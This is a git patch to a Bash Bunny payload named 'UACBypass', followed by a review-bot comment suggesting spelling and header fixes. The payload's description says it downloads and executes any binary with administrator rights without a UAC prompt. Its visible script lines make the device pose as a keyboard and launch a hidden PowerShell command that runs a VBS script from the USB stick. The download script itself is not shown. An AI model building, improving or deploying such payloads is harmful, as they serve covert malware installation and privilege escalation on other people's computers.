From 5e1dbdb4895d192f1b54121ecaea7337bd4882be Mon Sep 17 00:00:00 2001
From: Marc
Date: Fri, 5 Jul 2019 08:12:17 +0100
Subject: [PATCH] Cleanup: exe_UACBypassD&E: Update Payload Header
---
 .../execution/exe_UACBypassD&E/payload.txt | 23 +++++++++++++------
 1 file changed, 16 insertions(+), 7 deletions(-)
diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt
index a37dc4a8..1d7fcc98 100644
--- a/payloads/library/execution/exe_UACBypassD&E/payload.txt
+++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt
@@ -1,14 +1,24 @@
-# Title: UACBypass
-# Author: Skiddie
-# Version: 1.1
-# Target: Windows
+# Title: UACBypass
+# Author: Skiddie
+# Version: 1.1
+# Target: Windows
+# Attack Modes: HID, STORAGE
 #
-# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting
+# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
+# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
+# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
+# However from what I am aware version 7,8 and 8.1 are still effected.
+# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+#
+# LEDS:
+# Magenta: Starting
+# Green: Finished
 #Define your bunny storage stick name
 DRIVER_LABEL='BashBunny'
-#RED means starting
+#Magenta means starting
 LED SETUP
 #Gets File locations
@@ -17,7 +27,6 @@ GET SWITCH_POSITION
 #We are a keyboard
 ATTACKMODE HID STORAGE
-
 QUACK DELAY 500
 RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
 QUACK DELAY 1000
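Review bot: The rewrapped `# Description:` block in the first hunk carries over the spelling and grammar errors of the old one-line version, and a header cleanup is the natural place to fix them: `privliges` should be `privileges`, `still effected` should be `still affected`, and `Download and executes` should be `Downloads and executes`. The same block says "Works on Windows 7 - Windows 10" and then that the bypass was patched in Win10 V.1607, so the `# Target:` line would read more accurately if it stated that limit rather than just `Windows`. The new `# LEDS:` list documents `Green: Finished`, but no finishing LED line is visible in either hunk, so it is worth confirming that the rest of the payload actually sets it.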